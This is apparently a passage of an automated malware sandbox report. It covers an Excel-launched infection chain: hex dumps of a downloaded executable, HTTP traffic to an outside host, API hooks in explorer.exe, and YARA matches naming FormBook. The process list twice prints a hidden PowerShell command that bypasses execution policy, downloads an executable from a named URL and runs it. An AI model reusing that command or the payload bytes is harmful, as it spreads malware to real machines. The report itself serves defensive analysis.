                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26 7e 04 00 00 04 2d 49 2b 03 0a 2b f4 20 00 01 00 00 72 5f 00 00 70 14 d0 06 00 00 02 28 19 00 00 0a 17 8d 02 00 00 01 18 2d 1c 26 07 16 16 14 28 1e 00 00 0a a2 07 28 1f 00 00 0a 28 20 00 00 0a 15 2d 06 26 2b 0a 0b 2b e2 80 04 00 00 04 2b 00 7e 04 00 00 04 7b 21 00 00 0a 7e 04 00 00 04 06 6f 22 00 00 0a 2a 00 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 03 00 00 04 2c 0b 02 7b 03 00 00 04 6f 23 00 00 0a 02 03 17 2d 04 26 26 2b 07 28 24 00 00 0a 2b 00 2a 00 03 30 09 00 4a 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_PNo @ @nW H.textTO P `.rsrcR@@.relocn@B0oHJh$00-&(+&+*03(-&-&-&(+(+(+(+*0 -&s-&sX-&o++++(oj2+(rpH((*o[ot+}*0 {rpo-&&+}+*0u{(-&~-I++ r_p(-&((( -&+++~{!~o"*0',{,{o#-&&+($+*0J
                                              Nov 27, 2020 11:38:08.958878994 CET4979INData Raw: 00 00 02 73 25 00 00 0a 16 2c 2b 26 26 02 17 1d 2d 2b 26 26 02 20 20 03 00 00 20 c2 01 00 00 73 26 00 00 0a 17 2d 1d 26 26 02 72 7d 00 00 70 6f 27 00 00 0a 2b 15 7d 03 00 00 04 2b d0 28 28 00 00 0a 2b d0 28 29 00 00 0a 2b de 2a 00 00 03 30 0a 00
                                              Data Ascii: s%,+&&-+&& s&-&&r}po'+}+((+()+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0
                                              Nov 27, 2020 11:38:08.959620953 CET4981INData Raw: 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1a 1a 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1d 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30
                                              Data Ascii: &(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0
                                              Nov 27, 2020 11:38:08.959639072 CET4982INData Raw: 00 0a 7e 07 00 00 04 16 6a 6f 44 00 00 0a 7e 07 00 00 04 73 45 00 00 0a 0d d0 04 00 00 1b 28 19 00 00 0a 72 fb 00 00 70 73 46 00 00 0a 73 47 00 00 0a 13 04 11 04 09 6f 48 00 00 0a 74 04 00 00 1b 2b 06 0b 2b 9e 0c 2b aa 2a 1b 30 04 00 46 00 00 00
                                              Data Ascii: ~joD~sE(rpsFsGoHt+++*0F~sI-&++(rpsFsG-&oJ+o#**>0~sI-&++(rpsFsG-w&s>-
                                              Nov 27, 2020 11:38:08.959760904 CET4983INData Raw: c8 04 41 50 a5 3e 1d 1d 41 f0 74 20 ff c6 07 9d ff 5b ae 3e 7d 1a 9e e9 13 3c de e3 cd 11 4f a7 a6 bc 39 e2 e0 63 8e 6d 69 3c e1 a4 e6 a3 4f 9a 7b 7c e3 bc b9 8b 17 37 2f 69 3c 72 7e e3 49 4b 17 37 1e bb b8 71 e2 7e 07 35 1e df 7c d4 fc ad 7b f7
                                              Data Ascii: AP>At [>}<O9cmi<O{|7/i<r~IK7q~5|{D S>#zz&5AP#~~Q#wZV_U>x:5A.w]]]odK;~m8bZN~6U)7^IkV{iYWSI`~ow)
                                              Nov 27, 2020 11:38:08.959779978 CET4985INData Raw: 96 91 36 e5 a1 d1 d7 e5 dd 45 2f b1 57 ea b3 77 60 75 7a 0e d0 d4 d6 d5 68 7d 9c 6b 19 82 cb 8c e0 ec 15 74 ab 87 2a 34 38 3f 84 30 3b a4 3d 40 b4 ac a2 e1 50 a3 87 79 f7 b8 e2 30 65 47 42 60 2c 97 ad e1 70 2b 90 66 ab 94 fd 90 b2 8d bc c6 46 56
                                              Data Ascii: 6E/Ww`uzh}kt*48?0;=@Py0eGB`,p+fFVcxCvPxgGC??rcc{p8s=jdk`'?t5ELy8]WiJmnh9anWc66Uc"!(rmg-O;(`q0oMP
                                              Nov 27, 2020 11:38:08.959791899 CET4986INData Raw: 8d 7b 64 22 7e d1 5d 31 28 ec 80 61 65 1c ca 77 97 69 39 29 35 d1 e9 07 cc f6 b3 dd 1b 8f 8c be 3b 1e 0d 0f 8e 70 56 a1 2f 5f a2 3e ac 92 97 be 17 79 a9 79 47 0c 80 cd 78 89 a3 d7 af 30 ec 6c 84 b1 06 2e ad fa ba 6e c2 bf 98 0a 2a 60 af 88 be ab
                                              Data Ascii: {d"~]1(aewi9)5;pV/_>yyGx0l.n*` 0-QpvCX\+WD;eE;"VjwGjlBO0k&bhViFa^|#?F7qc=TkSO{)x'ZGsLDhn{C:
                                              Nov 27, 2020 11:38:08.959805012 CET4987INData Raw: e8 7f 00 5b a8 56 11 ab b6 75 4f 92 a9 7e 5a 5d 37 45 2c 45 f4 71 03 95 8c d6 f4 68 d9 1f 24 9d 49 da f7 a4 d2 8b 73 4f af 96 e3 c1 00 bd b3 bd 07 b4 ee 83 4a 7a e5 c6 21 78 23 db ab 61 bb b1 d0 97 d9 de d9 5e 6f b7 4e c6 a3 de d9 9e ad 7b 93 2b
                                              Data Ascii: [VuO~Z]7E,Eqh$IsOJz!x#a^oN{+fY6S3V6g}BLmr"}[ElV%x_]o/uZUF]T_Uzk=?\-VA"RrHRYv8|0pGOOj<vX`[
                                              Nov 27, 2020 11:38:08.959959030 CET4989INData Raw: 5b df c7 44 35 3e 9e a7 24 10 ef 69 f8 e9 fe 04 1f c0 46 f6 cd 3b e9 0c 59 69 5e ca 1f 1b d0 8f d9 cd 40 59 3c 87 55 d3 5d 7c 2a 5c 26 e1 3b f0 f4 70 35 fd 18 b8 b5 41 0b c6 35 2d 87 a1 c3 f0 84 70 3f 53 1d d9 26 7f 3c 88 5d 57 13 6e 48 04 0d 82
                                              Data Ascii: [D5>$iF;Yi^@Y<U]|*\&;p5A5-p?S&<]WnHk@XO2FBzFaGP65wqC{Qg`oH2avu]^a" RHp?57H47WqN8>+-Ee#]|
                                              Nov 27, 2020 11:38:08.959990978 CET4990INData Raw: 7b 29 4b ea 51 34 7a 86 a2 86 e3 51 03 59 38 2b 4d d7 58 e0 d7 e0 d1 56 86 46 9f 29 8b 28 c4 6e aa b0 03 dc b1 14 c4 6a b9 5e 6a ce 5a 08 de 58 87 9a 7f bc 0e 8d 83 03 87 d1 2b a2 8a 30 bc f7 a1 75 30 35 30 7d 2f de 85 7e c1 d6 0c 6f 60 61 78 f0
                                              Data Ascii: {)KQ4zQY8+MXVF)(nj^jZX+0u050}/~o`ax)g#<%ZD#y#0}+L^g'FH{]oH C1@Kv7Z|d!e(:^G`f(kFqR!`9@`SBH5p
                                              Nov 27, 2020 11:38:09.079015970 CET5006INData Raw: f1 53 30 5f 19 3b 2d b8 65 6b 77 af b3 ad dd b8 ce e0 b6 b8 de 86 75 b3 d0 59 7c ff 14 fb 7c 09 70 2f 82 e1 96 92 9a bc 67 19 77 5b 87 0e 87 bb ac 23 93 c7 f8 38 25 33 98 c6 75 96 2d 88 12 ec 0a a4 39 2e ed a7 d8 3e ed 61 58 32 64 68 9f 63 e1 f0
                                              Data Ascii: S0_;-ekwuY||p/gw[#8%3u-9.>aX2dhcM6n)qX>H^1I}6SfVFGf0-_A*(.scN?%JP7``q}\7I5Q7[)T{^,php5!C"


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.349744162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 27, 2020 11:38:08.898339987 CET4976OUTGET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:09.019684076 CET4992INHTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26 7e 04 00 00 04 2d 49 2b 03 0a 2b f4 20 00 01 00 00 72 5f 00 00 70 14 d0 06 00 00 02 28 19 00 00 0a 17 8d 02 00 00 01 18 2d 1c 26 07 16 16 14 28 1e 00 00 0a a2 07 28 1f 00 00 0a 28 20 00 00 0a 15 2d 06 26 2b 0a 0b 2b e2 80 04 00 00 04 2b 00 7e 04 00 00 04 7b 21 00 00 0a 7e 04 00 00 04 06 6f 22 00 00 0a 2a 00 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 03 00 00 04 2c 0b 02 7b 03 00 00 04 6f 23 00 00 0a 02 03 17 2d 04 26 26 2b 07 28 24 00 00 0a 2b 00 2a 00 03 30 09 00 4a 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_PNo @ @nW H.textTO P `.rsrcR@@.relocn@B0oHJh$00-&(+&+*03(-&-&-&(+(+(+(+*0 -&s-&sX-&o++++(oj2+(rpH((*o[ot+}*0 {rpo-&&+}+*0u{(-&~-I++ r_p(-&((( -&+++~{!~o"*0',{,{o#-&&+($+*0J
                                              Nov 27, 2020 11:38:09.019738913 CET4993INData Raw: 00 00 02 73 25 00 00 0a 16 2c 2b 26 26 02 17 1d 2d 2b 26 26 02 20 20 03 00 00 20 c2 01 00 00 73 26 00 00 0a 17 2d 1d 26 26 02 72 7d 00 00 70 6f 27 00 00 0a 2b 15 7d 03 00 00 04 2b d0 28 28 00 00 0a 2b d0 28 29 00 00 0a 2b de 2a 00 00 03 30 0a 00
                                              Data Ascii: s%,+&&-+&& s&-&&r}po'+}+((+()+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0
                                              Nov 27, 2020 11:38:09.019777060 CET4994INData Raw: 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1a 1a 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1d 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30
                                              Data Ascii: &(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0
                                              Nov 27, 2020 11:38:09.019817114 CET4996INData Raw: 00 0a 7e 07 00 00 04 16 6a 6f 44 00 00 0a 7e 07 00 00 04 73 45 00 00 0a 0d d0 04 00 00 1b 28 19 00 00 0a 72 fb 00 00 70 73 46 00 00 0a 73 47 00 00 0a 13 04 11 04 09 6f 48 00 00 0a 74 04 00 00 1b 2b 06 0b 2b 9e 0c 2b aa 2a 1b 30 04 00 46 00 00 00
                                              Data Ascii: ~joD~sE(rpsFsGoHt+++*0F~sI-&++(rpsFsG-&oJ+o#**>0~sI-&++(rpsFsG-w&s>-
                                              Nov 27, 2020 11:38:09.019855976 CET4997INData Raw: c8 04 41 50 a5 3e 1d 1d 41 f0 74 20 ff c6 07 9d ff 5b ae 3e 7d 1a 9e e9 13 3c de e3 cd 11 4f a7 a6 bc 39 e2 e0 63 8e 6d 69 3c e1 a4 e6 a3 4f 9a 7b 7c e3 bc b9 8b 17 37 2f 69 3c 72 7e e3 49 4b 17 37 1e bb b8 71 e2 7e 07 35 1e df 7c d4 fc ad 7b f7
                                              Data Ascii: AP>At [>}<O9cmi<O{|7/i<r~IK7q~5|{D S>#zz&5AP#~~Q#wZV_U>x:5A.w]]]odK;~m8bZN~6U)7^IkV{iYWSI`~ow)
                                              Nov 27, 2020 11:38:09.019896030 CET4999INData Raw: 96 91 36 e5 a1 d1 d7 e5 dd 45 2f b1 57 ea b3 77 60 75 7a 0e d0 d4 d6 d5 68 7d 9c 6b 19 82 cb 8c e0 ec 15 74 ab 87 2a 34 38 3f 84 30 3b a4 3d 40 b4 ac a2 e1 50 a3 87 79 f7 b8 e2 30 65 47 42 60 2c 97 ad e1 70 2b 90 66 ab 94 fd 90 b2 8d bc c6 46 56
                                              Data Ascii: 6E/Ww`uzh}kt*48?0;=@Py0eGB`,p+fFVcxCvPxgGC??rcc{p8s=jdk`'?t5ELy8]WiJmnh9anWc66Uc"!(rmg-O;(`q0oMP
                                              Nov 27, 2020 11:38:09.020236015 CET5000INData Raw: 8d 7b 64 22 7e d1 5d 31 28 ec 80 61 65 1c ca 77 97 69 39 29 35 d1 e9 07 cc f6 b3 dd 1b 8f 8c be 3b 1e 0d 0f 8e 70 56 a1 2f 5f a2 3e ac 92 97 be 17 79 a9 79 47 0c 80 cd 78 89 a3 d7 af 30 ec 6c 84 b1 06 2e ad fa ba 6e c2 bf 98 0a 2a 60 af 88 be ab
                                              Data Ascii: {d"~]1(aewi9)5;pV/_>yyGx0l.n*` 0-QpvCX\+WD;eE;"VjwGjlBO0k&bhViFa^|#?F7qc=TkSO{)x'ZGsLDhn{C:
                                              Nov 27, 2020 11:38:09.020278931 CET5001INData Raw: e8 7f 00 5b a8 56 11 ab b6 75 4f 92 a9 7e 5a 5d 37 45 2c 45 f4 71 03 95 8c d6 f4 68 d9 1f 24 9d 49 da f7 a4 d2 8b 73 4f af 96 e3 c1 00 bd b3 bd 07 b4 ee 83 4a 7a e5 c6 21 78 23 db ab 61 bb b1 d0 97 d9 de d9 5e 6f b7 4e c6 a3 de d9 9e ad 7b 93 2b
                                              Data Ascii: [VuO~Z]7E,Eqh$IsOJz!x#a^oN{+fY6S3V6g}BLmr"}[ElV%x_]o/uZUF]T_Uzk=?\-VA"RrHRYv8|0pGOOj<vX`[
                                              Nov 27, 2020 11:38:09.020317078 CET5003INData Raw: 5b df c7 44 35 3e 9e a7 24 10 ef 69 f8 e9 fe 04 1f c0 46 f6 cd 3b e9 0c 59 69 5e ca 1f 1b d0 8f d9 cd 40 59 3c 87 55 d3 5d 7c 2a 5c 26 e1 3b f0 f4 70 35 fd 18 b8 b5 41 0b c6 35 2d 87 a1 c3 f0 84 70 3f 53 1d d9 26 7f 3c 88 5d 57 13 6e 48 04 0d 82
                                              Data Ascii: [D5>$iF;Yi^@Y<U]|*\&;p5A5-p?S&<]WnHk@XO2FBzFaGP65wqC{Qg`oH2avu]^a" RHp?57H47WqN8>+-Ee#]|
                                              Nov 27, 2020 11:38:09.020354986 CET5004INData Raw: 7b 29 4b ea 51 34 7a 86 a2 86 e3 51 03 59 38 2b 4d d7 58 e0 d7 e0 d1 56 86 46 9f 29 8b 28 c4 6e aa b0 03 dc b1 14 c4 6a b9 5e 6a ce 5a 08 de 58 87 9a 7f bc 0e 8d 83 03 87 d1 2b a2 8a 30 bc f7 a1 75 30 35 30 7d 2f de 85 7e c1 d6 0c 6f 60 61 78 f0
                                              Data Ascii: {)KQ4zQY8+MXVF)(nj^jZX+0u050}/~o`ax)g#<%ZD#y#0}+L^g'FH{]oH C1@Kv7Z|d!e(:^G`f(kFqR!`9@`SBH5p
                                              Nov 27, 2020 11:38:09.137701035 CET5033INData Raw: f1 53 30 5f 19 3b 2d b8 65 6b 77 af b3 ad dd b8 ce e0 b6 b8 de 86 75 b3 d0 59 7c ff 14 fb 7c 09 70 2f 82 e1 96 92 9a bc 67 19 77 5b 87 0e 87 bb ac 23 93 c7 f8 38 25 33 98 c6 75 96 2d 88 12 ec 0a a4 39 2e ed a7 d8 3e ed 61 58 32 64 68 9f 63 e1 f0
                                              Data Ascii: S0_;-ekwuY||p/gw[#8%3u-9.>aX2dhcM6n)qX>H^1I}6SfVFGf0-_A*(.scN?%JP7``q}\7I5Q7[)T{^,php5!C"


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 5988 Parent PID: 792

                                              General

                                              Start time:11:36:38
                                              Start date:27/11/2020
                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x12f0000
                                              File size:27110184 bytes
                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: splwow64.exe PID: 3636 Parent PID: 5988

                                              General

                                              Start time:11:38:01
                                              Start date:27/11/2020
                                              Path:C:\Windows\splwow64.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\splwow64.exe 12288
                                              Imagebase:0x7ff704f00000
                                              File size:130560 bytes
                                              MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: powershell.exe PID: 5164 Parent PID: 4940

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: powershell.exe PID: 5184 Parent PID: 4940

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 5268 Parent PID: 5164

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 5280 Parent PID: 5184

                                              General

                                              Start time:11:38:05
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: oftmhayq.exe PID: 5540 Parent PID: 5164

                                              General

                                              Start time:11:38:09
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\oftmhayq.exe'
                                              Imagebase:0x7c0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: oftmhayq.exe PID: 4000 Parent PID: 5184

                                              General

                                              Start time:11:38:11
                                              Start date:27/11/2020
